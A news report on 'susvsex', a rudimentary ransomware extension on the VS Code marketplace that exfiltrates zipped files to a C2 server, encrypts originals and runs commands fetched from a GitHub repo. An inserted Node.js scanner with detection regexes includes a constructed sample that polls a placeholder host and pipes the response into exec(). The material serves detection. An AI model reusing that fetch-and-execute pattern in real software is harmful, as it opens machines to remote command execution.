Title: AI-Powered Ransomware Test Emerges on VS Code Marketplace


By Bill Toulas
November 6, 2025

A newly discovered malicious extension, exhibiting rudimentary ransomware capabilities, has found its way onto Microsoft’s Visual Studio Code (VS Code) marketplace. Identified as ‘susvsex’ and attributed to a publisher known as ‘suspublisher18’, this extension’s malevolent functions are explicitly detailed in its description, raising significant concerns among cybersecurity experts.

Researcher John Tuckner from Secure Annex unearthed ‘susvsex’ and characterizes it as a product of “vibe coding,” suggesting that it lacks sophistication. Despite Tuckner’s efforts to alert Microsoft about the extension’s alarming capabilities—such as file theft to a remote server and the AES-256-CBC encryption of files—his warnings were overlooked, leaving the extension on the VS Code marketplace.

Understanding the Functionality of the Ransomware Extension

Upon installation or when VS Code is launched, the extension triggers an event that initializes its ‘extension.js’ file, revealing hardcoded values like IP addresses, encryption keys, and the command-and-control (C2) address. Tuckner notes that many comments within this code imply it was likely generated by an AI tool rather than being manually coded by its publisher.

When activated, the extension executes a function called ‘zipUploadAndEncrypt’, which looks for a specific marker text file and commences its encryption process. It creates a .ZIP file containing the files from a designated target directory, then exfiltrates these files to the predetermined C2 address, effectively replacing the original files with their encrypted counterparts.

Data Exfiltration Mechanism

Tuckner’s investigation reveals that the extension periodically polls a private GitHub repository for commands: it fetches an ‘index.html’ file from the repository, authenticating with a hardcoded Personal Access Token (PAT), and executes any commands the file contains. Because the PAT is hardcoded, Tuckner was able to use it to access information about the host, which led him to believe that the repository owner is likely located in Azerbaijan.
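As an added defensive example (not code from the article, Secure Annex, or the extension itself), the following Node.js script statically triages an extension’s package.json and extension.js for the traits described above: startup activation, a hardcoded GitHub PAT, literal IP addresses, AES-256-CBC use, periodic polling of a remote host and shell command execution. The trait names, regex patterns and sample inputs are constructed for illustration; the token and IP address in the sample are placeholders.

```javascript
// Added example (not code from the article or the extension): static triage of
// a VS Code extension's package.json and extension.js for the traits the
// article describes. Trait ids, regexes and sample inputs are constructed.
const CHECKS = [
  // Classic (ghp_) and fine-grained (github_pat_) GitHub token formats.
  { id: 'hardcoded-github-pat', re: /\b(ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b/ },
  // Literal IPv4 addresses, e.g. a hardcoded C2 endpoint.
  { id: 'hardcoded-ipv4', re: /\b(?:\d{1,3}\.){3}\d{1,3}\b/ },
  // Symmetric file encryption with the cipher named in the article.
  { id: 'aes-256-cbc', re: /createCipheriv\(\s*['"]aes-256-cbc['"]/ },
  // setInterval followed closely by an HTTP client call: polling for commands.
  { id: 'remote-polling', re: /setInterval[\s\S]{0,400}(fetch\(|https?\.get\(|https?\.request\()/ },
  // Running text obtained at runtime as a shell command.
  { id: 'shell-exec', re: /\b(exec|execSync|spawn)\(/ },
];

// Returns the list of matched trait ids; an empty list means nothing flagged.
function scanExtension(manifestJson, sourceText) {
  const findings = [];
  const events = JSON.parse(manifestJson).activationEvents || [];
  // '*' and 'onStartupFinished' run the extension on every VS Code launch
  // without any user action, matching the activation the article describes.
  if (events.some((e) => e === '*' || e === 'onStartupFinished')) {
    findings.push('activates-on-startup');
  }
  for (const check of CHECKS) {
    if (check.re.test(sourceText)) findings.push(check.id);
  }
  return findings;
}

// Constructed sample: an unremarkable manifest plus a source file carrying
// every trait above. The token and IP address are placeholders, not real.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'sample-ext', main: './extension.js', activationEvents: ['onStartupFinished'],
});
const SAMPLE_SOURCE = `
const { exec } = require('child_process');
const TOKEN = 'ghp_${'A'.repeat(36)}';
const C2 = 'http://203.0.113.10/upload';
setInterval(() => {
  fetch('https://api.github.com/repos/o/r/contents/index.html',
    { headers: { Authorization: 'token ' + TOKEN } })
    .then((r) => r.text()).then((cmd) => exec(cmd));
}, 60000);
const cipher = crypto.createCipheriv('aes-256-cbc', KEY, IV);
`;
console.log(scanExtension(SAMPLE_MANIFEST, SAMPLE_SOURCE));
```

Point `scanExtension` at the `package.json` and main script of an installed extension (under `~/.vscode/extensions/`) to triage it; a hit is a reason to read the code, not proof of malice.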

The overt nature of the extension poses a significant risk, as it may represent an experimental attempt to probe Microsoft’s vetting processes for marketplace submissions.

The Implications of ‘susvsex’ on the VS Code Marketplace

Labeling ‘susvsex’ ‘AI slop’, Secure Annex highlights that its malicious intent is laid bare in the README file. However, the researchers caution that with a few modifications the extension could evolve into a far more potent threat. The situation prompted BleepingComputer to reach out to Microsoft for an official statement; the extension was still active at the time of reporting but was removed shortly thereafter.

Conclusion

The emergence of the ‘susvsex’ ransomware extension on the VS Code marketplace spotlights the growing risks associated with AI-assisted coding and marketplace security. Microsoft’s apparent inaction despite clear warnings raises questions about the effectiveness of their vetting processes for extensions. As the cybersecurity landscape continuously evolves, this incident serves as a reminder for developers and platform operators to maintain vigilance against potential threats, particularly those that leverage AI technology. Continuous monitoring and robust security measures are essential to protect users from similar risks in the future.

FAQ Section

1. What is the ‘susvsex’ extension?
The ‘susvsex’ extension is a malicious tool found on the VS Code marketplace that employs basic ransomware functionalities, including file encryption and data exfiltration.

2. How does the ransomware in ‘susvsex’ operate?
Upon installation or launch of VS Code, the extension initiates its code, creates a ZIP archive of specified files, and sends them to a hardcoded remote server before encrypting the originals.

3. Was Microsoft informed about the extension?
Yes, researcher John Tuckner reported the extension to Microsoft due to its explicit malicious capabilities, but the report was initially ignored.

4. What are the potential risks of the ‘susvsex’ extension?
The extension poses a data theft threat and could lead to significant disruptions for developers using affected files. It may also represent a broader issue regarding marketplace security and AI-generated code.

5. Why is ‘susvsex’ considered an “AI slop”?
The term “AI slop” refers to code that appears to be poorly generated or lacking sophistication, likely produced by AI tools without a thorough understanding of secure coding practices.
